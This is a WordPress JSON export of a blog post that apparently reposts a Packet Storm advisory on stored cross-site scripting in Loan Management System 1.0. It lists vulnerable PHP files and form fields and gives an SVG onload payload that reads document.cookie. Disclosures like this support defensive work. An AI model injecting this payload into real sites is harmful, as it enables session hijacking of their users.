{"id":28548,"date":"2022-07-28T19:40:09","date_gmt":"2022-07-28T15:40:09","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167861\/loanms10-xss.txt"},"modified":"2022-07-30T10:11:00","modified_gmt":"2022-07-30T05:41:00","slug":"loan-management-system-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/loan-management-system-1-0-cross-site-scripting\/","title":{"rendered":"Loan Management System 1.0 Cross Site Scripting"},"content":{"rendered":"<dl id=\"F167861\" class=\"file first\">\n<dt dir=\"ltr\"><a class=\"ico text-plain\" title=\"Size: 0.6 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/167861\/loanms10-xss.txt\" target=\"_blank\" rel=\"noopener\"><strong>Loan Management System 1.0 Cross Site Scripting<\/strong><\/a><\/dt>\n<dd class=\"datetime\" dir=\"ltr\">Posted <a title=\"14:53:27 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2022-07-28\/\" target=\"_blank\" rel=\"noopener\">Jul 28, 2022<\/a><\/dd>\n<dd class=\"refer\" dir=\"ltr\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/16385\/\" target=\"_blank\" rel=\"noopener\">saitamang<\/a><\/dd>\n<dd class=\"detail\" dir=\"ltr\">Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability.<\/dd>\n<dd class=\"tags\" dir=\"ltr\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/xss\" target=\"_blank\" rel=\"noopener\">xss<\/a><\/dd>\n<dd class=\"md5\" dir=\"ltr\">SHA-256 | <code>44b807c10851b4db74cc02ac40db2bbe66fd7376b59011a5c95ab7a8d9bd232b<\/code><\/dd>\n<dd class=\"act-links\" dir=\"ltr\"><a title=\"Size: 0.6 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/167861\/loanms10-xss.txt\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/167861\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/167861\/Loan-Management-System-1.0-Cross-Site-Scripting.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" dir=\"ltr\">\n<pre><code># Exploit Title: Loan Management System - Stored XSS on several parameters\r\n# Date: 28\/07\/2022\r\n# Exploit Author: saitamang\r\n# Vendor Homepage: sourcecodester\r\n# Software Link: https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/razormist\/LMS.zip\r\n# Version: 1.0\r\n# Tested on: Centos 7 apache2 + MySQL<\/code><\/pre>\n<p>There are several functions and parameter affected as below:<\/p>\n<pre><code><\/code><\/pre>\n<p>addUser.php<br \/>\n&#8211; firstname<br \/>\n&#8211; lastname<\/p>\n<pre><code><\/code><\/pre>\n<p>save_ltype.php<br \/>\n&#8211; ltype_name<br \/>\n&#8211; ltype_desc<\/p>\n<pre><code><\/code><\/pre>\n<p>save_borrower.php<br \/>\n&#8211; firstname<br \/>\n&#8211; middlename<br \/>\n&#8211; lastname<br \/>\n&#8211; address<\/p>\n<pre><code><\/code><\/pre>\n<p>The payload use to inject is &#8220;\/&gt;&lt;svg\/onload=alert(document.cookie)&gt;<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Loan Management System 1.0 Cross Site Scripting Posted Jul 28, 2022 Authored by saitamang Loan Management System version 1.0 suffers from a persistent cross site scripting vulnerability. tags | exploit, xss SHA-256 | 44b807c10851b4db74cc02ac40db2bbe66fd7376b59011a5c95ab7a8d9bd232b Download | Favorite | View # Exploit Title: Loan Management System &#8211; Stored XSS on several parameters # Date: 28\/07\/2022 # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-28548","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28548","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=28548"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/28548\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=28548"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=28548"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=28548"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}